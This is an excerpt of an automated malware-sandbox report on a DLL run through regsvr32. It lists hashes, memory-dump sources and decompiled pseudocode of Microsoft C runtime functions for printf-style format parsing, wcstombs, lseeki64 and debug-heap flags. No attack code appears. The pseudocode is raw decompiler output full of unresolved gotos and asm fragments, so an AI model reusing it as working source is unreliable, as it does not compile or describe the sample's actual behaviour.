                                • API ID: Locale$UpdateUpdate::~_
                                • String ID:
                                • API String ID: 1901436342-0
                                • Opcode ID: 69024ba52bd34e7b32b0e788ec4f64afe9409c237456bc3d803b93947163d83b
                                • Instruction ID: 704f50b174c78f8dad9e9ad97ccd9f8c7b4629f2dc49822da5bcfb1c8acb2663
                                • Opcode Fuzzy Hash: 69024ba52bd34e7b32b0e788ec4f64afe9409c237456bc3d803b93947163d83b
                                • Instruction Fuzzy Hash: 2E21A732D0C64186E7A09B28E84436EBBA0E784768F614226E3DD426F9DB7ED545CF41
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: _invalid_parameter
                                • String ID: P$_wcstombs_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\wcstombs.c$sizeInBytes > retsize
                                • API String ID: 2123368286-552404435
                                • Opcode ID: 2c731414488d35c21f2780f328146d5dcf70469cadf2ee42e60feab36cc6bb66
                                • Instruction ID: b798cd5c2606ce723a50a96b999359d63c775ee68ba37fd19eb3efa8b303dc8f
                                • Opcode Fuzzy Hash: 2c731414488d35c21f2780f328146d5dcf70469cadf2ee42e60feab36cc6bb66
                                • Instruction Fuzzy Hash: C2511936A0DBC586E6B48B19E84476EB3E0F386761F204225D6ED43BE8DF7ED4458B01
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 28%
                                			E000007FE7FEF9D3BCBD(intOrPtr _a76, signed int _a80, signed int _a88, signed int _a92, signed int _a108, signed int _a112, intOrPtr _a116, signed int _a696, intOrPtr _a704, char _a968, char _a972, signed int _a976, void* _a1096, char _a1112) {
                                				void* _t184;
                                				char* _t204;
                                				char* _t205;
                                
                                				_a112 = 0;
                                				_a108 = _a112;
                                				_a88 = _a108;
                                				_a92 = _a88;
                                				_a80 = 0;
                                				_a116 = 0xffffffff;
                                				_a76 = 0;
                                				_a968 = _a696 & 0x000000ff;
                                				if (_a968 == 0x20) goto 0xf9d3bd57;
                                				if (_a968 == 0x23) goto 0xf9d3bd64;
                                				if (_a968 == 0x2b) goto 0xf9d3bd4a;
                                				if (_a968 == 0x2d) goto 0xf9d3bd3d;
                                				if (_a968 == 0x30) goto 0xf9d3bd72;
                                				goto 0xf9d3bd7d;
                                				_a80 = _a80 | 0x00000004;
                                				goto 0xf9d3bd7d;
                                				_a80 = _a80 | 0x00000001;
                                				goto 0xf9d3bd7d;
                                				_a80 = _a80 | 0x00000002;
                                				goto 0xf9d3bd7d;
                                				asm("bts eax, 0x7");
                                				goto 0xf9d3bd7d;
                                				_a80 = _a80 | 0x00000008;
                                				if (_a696 != 0x2a) goto 0xf9d3bdbe;
                                				_t204 =  &_a1112;
                                				_a88 = E000007FE7FEF9D31E40(_t204);
                                				if (_a88 >= 0) goto 0xf9d3bdbc;
                                				_a80 = _a80 | 0x00000004;
                                				_a88 =  ~_a88;
                                				goto 0xf9d3bdd5;
                                				_a88 = _t184 + _t204 - 0x30;
                                				_a116 = 0;
                                				if (_a696 != 0x2a) goto 0xf9d3be16;
                                				_t205 =  &_a1112;
                                				_a116 = E000007FE7FEF9D31E40(_t205);
                                				if (_a116 >= 0) goto 0xf9d3be14;
                                				_a116 = 0xffffffff;
                                				goto 0xf9d3be2d;
                                				_a116 = _t184 + _t205 - 0x30;
                                				_a972 = _a696 & 0x000000ff;
                                				if (_a972 == 0x49) goto 0xf9d3beb7;
                                				if (_a972 == 0x68) goto 0xf9d3bfc0;
                                				if (_a972 == 0x6c) goto 0xf9d3be76;
                                				if (_a972 == 0x77) goto 0xf9d3bfcd;
                                				goto 0xf9d3bfd9;
                                				if ( *_a1096 != 0x6c) goto 0xf9d3bea7;
                                				_a1096 = _a1096 + 1;
                                				asm("bts eax, 0xc");
                                				goto 0xf9d3beb2;
                                				_a80 = _a80 | 0x00000010;
                                				goto 0xf9d3bfd9;
                                				asm("bts eax, 0xf");
                                				if ( *_a1096 != 0x36) goto 0xf9d3bf09;
                                				if ( *((char*)(_a1096 + 1)) != 0x34) goto 0xf9d3bf09;
                                				_a1096 = _a1096 + 2;
                                				asm("bts eax, 0xf");
                                				goto 0xf9d3bfbe;
                                				if ( *_a1096 != 0x33) goto 0xf9d3bf4c;
                                				if ( *((char*)(_a1096 + 1)) != 0x32) goto 0xf9d3bf4c;
                                				_a1096 = _a1096 + 2;
                                				asm("btr eax, 0xf");
                                				goto 0xf9d3bfbe;
                                				if ( *_a1096 == 0x64) goto 0xf9d3bfac;
                                				if ( *_a1096 == 0x69) goto 0xf9d3bfac;
                                				if ( *_a1096 == 0x6f) goto 0xf9d3bfac;
                                				if ( *_a1096 == 0x75) goto 0xf9d3bfac;
                                				if ( *_a1096 == 0x78) goto 0xf9d3bfac;
                                				if ( *_a1096 != 0x58) goto 0xf9d3bfae;
                                				goto 0xf9d3bfbe;
                                				_a704 = 0;
                                				goto E000007FE7FEF9D3BB66;
                                				goto 0xf9d3bfd9;
                                				_a80 = _a80 | 0x00000020;
                                				goto 0xf9d3bfd9;
                                				asm("bts eax, 0xb");
                                				_a976 = _a696;
                                				_a976 = _a976 - 0x41;
                                				if (_a976 - 0x37 > 0) goto 0xf9d3ca31;
                                				goto __rax;
                                			}







                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: Locale$UpdateUpdate::~_$_invalid_parameter
                                • String ID: ("Incorrect format specifier", 0)$_output_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                • API String ID: 2192614184-192189897
                                • Opcode ID: 6e7b2e4602a67de0d8444751781932987c77aea524c4ee0e513499fa92d069a1
                                • Instruction ID: aadf3acbccf6ff41cc1b37cb3268d324d4900ab85ae7fa80aabce8c8f65e01df
                                • Opcode Fuzzy Hash: 6e7b2e4602a67de0d8444751781932987c77aea524c4ee0e513499fa92d069a1
                                • Instruction Fuzzy Hash: 13414C72A0D6C28AE3B0DB24E8547BEB7E4E385345F600126D6D987AA9DB7DD541CF00
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 28%
                                			E000007FE7FEF9D3DC6B(intOrPtr _a76, signed int _a80, signed int _a88, signed int _a92, signed int _a108, signed int _a112, intOrPtr _a116, signed int _a1208, intOrPtr _a1216, signed int _a1404, signed int _a1408, signed int _a1412, signed short* _a1544, char _a1560) {
                                				void* _t184;
                                				char* _t204;
                                				char* _t205;
                                
                                				_a112 = 0;
                                				_a108 = _a112;
                                				_a88 = _a108;
                                				_a92 = _a88;
                                				_a80 = 0;
                                				_a116 = 0xffffffff;
                                				_a76 = 0;
                                				_a1404 = _a1208 & 0x0000ffff;
                                				if (_a1404 == 0x20) goto 0xf9d3dd05;
                                				if (_a1404 == 0x23) goto 0xf9d3dd12;
                                				if (_a1404 == 0x2b) goto 0xf9d3dcf8;
                                				if (_a1404 == 0x2d) goto 0xf9d3dceb;
                                				if (_a1404 == 0x30) goto 0xf9d3dd20;
                                				goto 0xf9d3dd2b;
                                				_a80 = _a80 | 0x00000004;
                                				goto 0xf9d3dd2b;
                                				_a80 = _a80 | 0x00000001;
                                				goto 0xf9d3dd2b;
                                				_a80 = _a80 | 0x00000002;
                                				goto 0xf9d3dd2b;
                                				asm("bts eax, 0x7");
                                				goto 0xf9d3dd2b;
                                				_a80 = _a80 | 0x00000008;
                                				if ((_a1208 & 0x0000ffff) != 0x2a) goto 0xf9d3dd6c;
                                				_t204 =  &_a1560;
                                				_a88 = E000007FE7FEF9D31E40(_t204);
                                				if (_a88 >= 0) goto 0xf9d3dd6a;
                                				_a80 = _a80 | 0x00000004;
                                				_a88 =  ~_a88;
                                				goto 0xf9d3dd83;
                                				_a88 = _t184 + _t204 - 0x30;
                                				_a116 = 0;
                                				if ((_a1208 & 0x0000ffff) != 0x2a) goto 0xf9d3ddc4;
                                				_t205 =  &_a1560;
                                				_a116 = E000007FE7FEF9D31E40(_t205);
                                				if (_a116 >= 0) goto 0xf9d3ddc2;
                                				_a116 = 0xffffffff;
                                				goto 0xf9d3dddb;
                                				_a116 = _t184 + _t205 - 0x30;
                                				_a1408 = _a1208 & 0x0000ffff;
                                				if (_a1408 == 0x49) goto 0xf9d3de66;
                                				if (_a1408 == 0x68) goto 0xf9d3df6f;
                                				if (_a1408 == 0x6c) goto 0xf9d3de24;
                                				if (_a1408 == 0x77) goto 0xf9d3df7c;
                                				goto 0xf9d3df88;
                                				if (( *_a1544 & 0x0000ffff) != 0x6c) goto 0xf9d3de56;
                                				_a1544 =  &(_a1544[1]);
                                				asm("bts eax, 0xc");
                                				goto 0xf9d3de61;
                                				_a80 = _a80 | 0x00000010;
                                				goto 0xf9d3df88;
                                				asm("bts eax, 0xf");
                                				if (( *_a1544 & 0x0000ffff) != 0x36) goto 0xf9d3deb8;
                                				if ((_a1544[1] & 0x0000ffff) != 0x34) goto 0xf9d3deb8;
                                				_a1544 =  &(_a1544[2]);
                                				asm("bts eax, 0xf");
                                				goto 0xf9d3df6d;
                                				if (( *_a1544 & 0x0000ffff) != 0x33) goto 0xf9d3defb;
                                				if ((_a1544[1] & 0x0000ffff) != 0x32) goto 0xf9d3defb;
                                				_a1544 =  &(_a1544[2]);
                                				asm("btr eax, 0xf");
                                				goto 0xf9d3df6d;
                                				if (( *_a1544 & 0x0000ffff) == 0x64) goto 0xf9d3df5b;
                                				if (( *_a1544 & 0x0000ffff) == 0x69) goto 0xf9d3df5b;
                                				if (( *_a1544 & 0x0000ffff) == 0x6f) goto 0xf9d3df5b;
                                				if (( *_a1544 & 0x0000ffff) == 0x75) goto 0xf9d3df5b;
                                				if (( *_a1544 & 0x0000ffff) == 0x78) goto 0xf9d3df5b;
                                				if (( *_a1544 & 0x0000ffff) != 0x58) goto 0xf9d3df5d;
                                				goto 0xf9d3df6d;
                                				_a1216 = 0;
                                				goto E000007FE7FEF9D3DC41;
                                				goto 0xf9d3df88;
                                				_a80 = _a80 | 0x00000020;
                                				goto 0xf9d3df88;
                                				asm("bts eax, 0xb");
                                				_a1412 = _a1208 & 0x0000ffff;
                                				_a1412 = _a1412 - 0x41;
                                				if (_a1412 - 0x37 > 0) goto 0xf9d3ea2a;
                                				goto __rax;
                                			}







                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: Locale$UpdateUpdate::~_$_invalid_parameter
                                • String ID: ("Incorrect format specifier", 0)$_woutput_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                • API String ID: 2192614184-734865713
                                • Opcode ID: f70cefb569721d9d21904d9e7ba8b3a65f1b1d02a652e36c9b8a6a51e541d649
                                • Instruction ID: e7137eedf57618a3e563147601a49a8da4cfcefd457897bce2b88a2abc432a47
                                • Opcode Fuzzy Hash: f70cefb569721d9d21904d9e7ba8b3a65f1b1d02a652e36c9b8a6a51e541d649
                                • Instruction Fuzzy Hash: 7E411CB2A0C6C18AE7B0CB64E8447BEB7E0F384349F600125E6D987AA9D77DD445CF14
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 28%
                                			E000007FE7FEF9D3DC41(intOrPtr _a76, signed int _a80, signed int _a88, signed int _a92, signed int _a108, signed int _a112, intOrPtr _a116, char _a1200, signed int _a1208, intOrPtr _a1216, signed int _a1404, signed int _a1408, signed int _a1412, intOrPtr _a1536, signed short* _a1544, char _a1560) {
                                				void* _t190;
                                				char* _t210;
                                				char* _t211;
                                
                                				_a76 = 1;
                                				E000007FE7FEF9D3EE40(_a1208 & 0x0000ffff, _a1536,  &_a1200);
                                				_a112 = 0;
                                				_a108 = _a112;
                                				_a88 = _a108;
                                				_a92 = _a88;
                                				_a80 = 0;
                                				_a116 = 0xffffffff;
                                				_a76 = 0;
                                				_a1404 = _a1208 & 0x0000ffff;
                                				if (_a1404 == 0x20) goto 0xf9d3dd05;
                                				if (_a1404 == 0x23) goto 0xf9d3dd12;
                                				if (_a1404 == 0x2b) goto 0xf9d3dcf8;
                                				if (_a1404 == 0x2d) goto 0xf9d3dceb;
                                				if (_a1404 == 0x30) goto 0xf9d3dd20;
                                				goto 0xf9d3dd2b;
                                				_a80 = _a80 | 0x00000004;
                                				goto 0xf9d3dd2b;
                                				_a80 = _a80 | 0x00000001;
                                				goto 0xf9d3dd2b;
                                				_a80 = _a80 | 0x00000002;
                                				goto 0xf9d3dd2b;
                                				asm("bts eax, 0x7");
                                				goto 0xf9d3dd2b;
                                				_a80 = _a80 | 0x00000008;
                                				if ((_a1208 & 0x0000ffff) != 0x2a) goto 0xf9d3dd6c;
                                				_t210 =  &_a1560;
                                				_a88 = E000007FE7FEF9D31E40(_t210);
                                				if (_a88 >= 0) goto 0xf9d3dd6a;
                                				_a80 = _a80 | 0x00000004;
                                				_a88 =  ~_a88;
                                				goto 0xf9d3dd83;
                                				_a88 = _t190 + _t210 - 0x30;
                                				_a116 = 0;
                                				if ((_a1208 & 0x0000ffff) != 0x2a) goto 0xf9d3ddc4;
                                				_t211 =  &_a1560;
                                				_a116 = E000007FE7FEF9D31E40(_t211);
                                				if (_a116 >= 0) goto 0xf9d3ddc2;
                                				_a116 = 0xffffffff;
                                				goto 0xf9d3dddb;
                                				_a116 = _t190 + _t211 - 0x30;
                                				_a1408 = _a1208 & 0x0000ffff;
                                				if (_a1408 == 0x49) goto 0xf9d3de66;
                                				if (_a1408 == 0x68) goto 0xf9d3df6f;
                                				if (_a1408 == 0x6c) goto 0xf9d3de24;
                                				if (_a1408 == 0x77) goto 0xf9d3df7c;
                                				goto 0xf9d3df88;
                                				if (( *_a1544 & 0x0000ffff) != 0x6c) goto 0xf9d3de56;
                                				_a1544 =  &(_a1544[1]);
                                				asm("bts eax, 0xc");
                                				goto 0xf9d3de61;
                                				_a80 = _a80 | 0x00000010;
                                				goto 0xf9d3df88;
                                				asm("bts eax, 0xf");
                                				if (( *_a1544 & 0x0000ffff) != 0x36) goto 0xf9d3deb8;
                                				if ((_a1544[1] & 0x0000ffff) != 0x34) goto 0xf9d3deb8;
                                				_a1544 =  &(_a1544[2]);
                                				asm("bts eax, 0xf");
                                				goto 0xf9d3df6d;
                                				if (( *_a1544 & 0x0000ffff) != 0x33) goto 0xf9d3defb;
                                				if ((_a1544[1] & 0x0000ffff) != 0x32) goto 0xf9d3defb;
                                				_a1544 =  &(_a1544[2]);
                                				asm("btr eax, 0xf");
                                				goto 0xf9d3df6d;
                                				if (( *_a1544 & 0x0000ffff) == 0x64) goto 0xf9d3df5b;
                                				if (( *_a1544 & 0x0000ffff) == 0x69) goto 0xf9d3df5b;
                                				if (( *_a1544 & 0x0000ffff) == 0x6f) goto 0xf9d3df5b;
                                				if (( *_a1544 & 0x0000ffff) == 0x75) goto 0xf9d3df5b;
                                				if (( *_a1544 & 0x0000ffff) == 0x78) goto 0xf9d3df5b;
                                				if (( *_a1544 & 0x0000ffff) != 0x58) goto 0xf9d3df5d;
                                				goto 0xf9d3df6d;
                                				_a1216 = 0;
                                				goto E000007FE7FEF9D3DC41;
                                				goto 0xf9d3df88;
                                				_a80 = _a80 | 0x00000020;
                                				goto 0xf9d3df88;
                                				asm("bts eax, 0xb");
                                				_a1412 = _a1208 & 0x0000ffff;
                                				_a1412 = _a1412 - 0x41;
                                				if (_a1412 - 0x37 > 0) goto 0xf9d3ea2a;
                                				goto __rax;
                                			}







                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: Locale$UpdateUpdate::~_$_invalid_parameter
                                • String ID: ("Incorrect format specifier", 0)$_woutput_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                • API String ID: 2192614184-734865713
                                • Opcode ID: 7ccb00da1bd0fb9220a44591d36c0492ce99534c897a7d6a17d24537f8dc2fa2
                                • Instruction ID: fc8006ff6f8d7d76551d502993a9577a4ed4fa9ca6386b0b138cfffaa104f198
                                • Opcode Fuzzy Hash: 7ccb00da1bd0fb9220a44591d36c0492ce99534c897a7d6a17d24537f8dc2fa2
                                • Instruction Fuzzy Hash: 48412BB2A0C6C286E7F09B64E8407BE72E4F38434AF600126D6C9875A9DB3ED444CF14
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 24%
                                			E000007FE7FEF9D3BDDA(signed int _a80, intOrPtr _a116, signed int _a696, intOrPtr _a704, char _a972, signed int _a976, void* _a1096, char _a1112) {
                                				void* _t114;
                                				char* _t134;
                                
                                				_a116 = 0;
                                				if (_a696 != 0x2a) goto 0xf9d3be16;
                                				_t134 =  &_a1112;
                                				_a116 = E000007FE7FEF9D31E40(_t134);
                                				if (_a116 >= 0) goto 0xf9d3be14;
                                				_a116 = 0xffffffff;
                                				goto 0xf9d3be2d;
                                				_a116 = _t114 + _t134 - 0x30;
                                				_a972 = _a696 & 0x000000ff;
                                				if (_a972 == 0x49) goto 0xf9d3beb7;
                                				if (_a972 == 0x68) goto 0xf9d3bfc0;
                                				if (_a972 == 0x6c) goto 0xf9d3be76;
                                				if (_a972 == 0x77) goto 0xf9d3bfcd;
                                				goto 0xf9d3bfd9;
                                				if ( *_a1096 != 0x6c) goto 0xf9d3bea7;
                                				_a1096 = _a1096 + 1;
                                				asm("bts eax, 0xc");
                                				goto 0xf9d3beb2;
                                				_a80 = _a80 | 0x00000010;
                                				goto 0xf9d3bfd9;
                                				asm("bts eax, 0xf");
                                				if ( *_a1096 != 0x36) goto 0xf9d3bf09;
                                				if ( *((char*)(_a1096 + 1)) != 0x34) goto 0xf9d3bf09;
                                				_a1096 = _a1096 + 2;
                                				asm("bts eax, 0xf");
                                				goto 0xf9d3bfbe;
                                				if ( *_a1096 != 0x33) goto 0xf9d3bf4c;
                                				if ( *((char*)(_a1096 + 1)) != 0x32) goto 0xf9d3bf4c;
                                				_a1096 = _a1096 + 2;
                                				asm("btr eax, 0xf");
                                				goto 0xf9d3bfbe;
                                				if ( *_a1096 == 0x64) goto 0xf9d3bfac;
                                				if ( *_a1096 == 0x69) goto 0xf9d3bfac;
                                				if ( *_a1096 == 0x6f) goto 0xf9d3bfac;
                                				if ( *_a1096 == 0x75) goto 0xf9d3bfac;
                                				if ( *_a1096 == 0x78) goto 0xf9d3bfac;
                                				if ( *_a1096 != 0x58) goto 0xf9d3bfae;
                                				goto 0xf9d3bfbe;
                                				_a704 = 0;
                                				goto E000007FE7FEF9D3BB66;
                                				goto 0xf9d3bfd9;
                                				_a80 = _a80 | 0x00000020;
                                				goto 0xf9d3bfd9;
                                				asm("bts eax, 0xb");
                                				_a976 = _a696;
                                				_a976 = _a976 - 0x41;
                                				if (_a976 - 0x37 > 0) goto 0xf9d3ca31;
                                				goto __rax;
                                			}





                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: Locale$UpdateUpdate::~_$_invalid_parameter
                                • String ID: ("Incorrect format specifier", 0)$_output_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                • API String ID: 2192614184-192189897
                                • Opcode ID: 365a2dca31272ad0c00aec3a5831cb280a19fde5761ae3667445a1def64af164
                                • Instruction ID: 4b3f24e3fb7174c937380b25a7ddf4328f53ddd6ef2afac6cc97801a46cd3647
                                • Opcode Fuzzy Hash: 365a2dca31272ad0c00aec3a5831cb280a19fde5761ae3667445a1def64af164
                                • Instruction Fuzzy Hash: 41416E72A0DAC28AE3F0DB24E8547BEB7E4E385345F600126D6DD869A9DB7ED141CF00
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 24%
                                			E000007FE7FEF9D3DD88(signed int _a80, intOrPtr _a116, signed int _a1208, intOrPtr _a1216, signed int _a1408, signed int _a1412, signed short* _a1544, char _a1560) {
                                				void* _t114;
                                				char* _t134;
                                
                                				_a116 = 0;
                                				if ((_a1208 & 0x0000ffff) != 0x2a) goto 0xf9d3ddc4;
                                				_t134 =  &_a1560;
                                				_a116 = E000007FE7FEF9D31E40(_t134);
                                				if (_a116 >= 0) goto 0xf9d3ddc2;
                                				_a116 = 0xffffffff;
                                				goto 0xf9d3dddb;
                                				_a116 = _t114 + _t134 - 0x30;
                                				_a1408 = _a1208 & 0x0000ffff;
                                				if (_a1408 == 0x49) goto 0xf9d3de66;
                                				if (_a1408 == 0x68) goto 0xf9d3df6f;
                                				if (_a1408 == 0x6c) goto 0xf9d3de24;
                                				if (_a1408 == 0x77) goto 0xf9d3df7c;
                                				goto 0xf9d3df88;
                                				if (( *_a1544 & 0x0000ffff) != 0x6c) goto 0xf9d3de56;
                                				_a1544 =  &(_a1544[1]);
                                				asm("bts eax, 0xc");
                                				goto 0xf9d3de61;
                                				_a80 = _a80 | 0x00000010;
                                				goto 0xf9d3df88;
                                				asm("bts eax, 0xf");
                                				if (( *_a1544 & 0x0000ffff) != 0x36) goto 0xf9d3deb8;
                                				if ((_a1544[1] & 0x0000ffff) != 0x34) goto 0xf9d3deb8;
                                				_a1544 =  &(_a1544[2]);
                                				asm("bts eax, 0xf");
                                				goto 0xf9d3df6d;
                                				if (( *_a1544 & 0x0000ffff) != 0x33) goto 0xf9d3defb;
                                				if ((_a1544[1] & 0x0000ffff) != 0x32) goto 0xf9d3defb;
                                				_a1544 =  &(_a1544[2]);
                                				asm("btr eax, 0xf");
                                				goto 0xf9d3df6d;
                                				if (( *_a1544 & 0x0000ffff) == 0x64) goto 0xf9d3df5b;
                                				if (( *_a1544 & 0x0000ffff) == 0x69) goto 0xf9d3df5b;
                                				if (( *_a1544 & 0x0000ffff) == 0x6f) goto 0xf9d3df5b;
                                				if (( *_a1544 & 0x0000ffff) == 0x75) goto 0xf9d3df5b;
                                				if (( *_a1544 & 0x0000ffff) == 0x78) goto 0xf9d3df5b;
                                				if (( *_a1544 & 0x0000ffff) != 0x58) goto 0xf9d3df5d;
                                				goto 0xf9d3df6d;
                                				_a1216 = 0;
                                				goto E000007FE7FEF9D3DC41;
                                				goto 0xf9d3df88;
                                				_a80 = _a80 | 0x00000020;
                                				goto 0xf9d3df88;
                                				asm("bts eax, 0xb");
                                				_a1412 = _a1208 & 0x0000ffff;
                                				_a1412 = _a1412 - 0x41;
                                				if (_a1412 - 0x37 > 0) goto 0xf9d3ea2a;
                                				goto __rax;
                                			}





                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: Locale$UpdateUpdate::~_$_invalid_parameter
                                • String ID: ("Incorrect format specifier", 0)$_woutput_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                • API String ID: 2192614184-734865713
                                • Opcode ID: 18be2ec324f4e6ddaf4da83870b7f9445444224664337f66457babe689a72d53
                                • Instruction ID: 7f650dd300c45f52e976b570372fea59531d88f616deac0b68cc0cf4a1a25f4d
                                • Opcode Fuzzy Hash: 18be2ec324f4e6ddaf4da83870b7f9445444224664337f66457babe689a72d53
                                • Instruction Fuzzy Hash: 9D4128A2A0C6C286E7F09B64E8447BE72E4F38434AF600126D6C9876A9DB3ED444CF14
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Strings
                                • f:\dd\vctools\crt_bld\self_64_amd64\crt\src\lseeki64.c, xrefs: 000007FEF9D39578
                                • ("Invalid file descriptor. File possibly closed by a different thread",0), xrefs: 000007FEF9D39563
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: ErrorFileLastPointer__doserrno_dosmaperr
                                • String ID: ("Invalid file descriptor. File possibly closed by a different thread",0)$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\lseeki64.c
                                • API String ID: 275287319-2412454244
                                • Opcode ID: c7efb4c2b63aa0ea1a393bbb45a77ac8f6d4c0e98eaf8d85a5d097220697af2b
                                • Instruction ID: 4cc925a7ddd92a70968dc62c242263200834f6053f28a3bc4a48022cf8d44a9e
                                • Opcode Fuzzy Hash: c7efb4c2b63aa0ea1a393bbb45a77ac8f6d4c0e98eaf8d85a5d097220697af2b
                                • Instruction Fuzzy Hash: FA318372A18B85C6D790CB28E88066E73A1F7857A5F604325E6FE47AF9CB3DD440CB00
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: _invalid_parameter_unlock
                                • String ID: (fNewBits==_CRTDBG_REPORT_FLAG) || ((fNewBits & 0x0ffff & ~(_CRTDBG_ALLOC_MEM_DF | _CRTDBG_DELAY_FREE_MEM_DF | _CRTDBG_CHECK_ALWAY$_CrtSetDbgFlag$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\dbgheap.c
                                • API String ID: 2816345473-1282596470
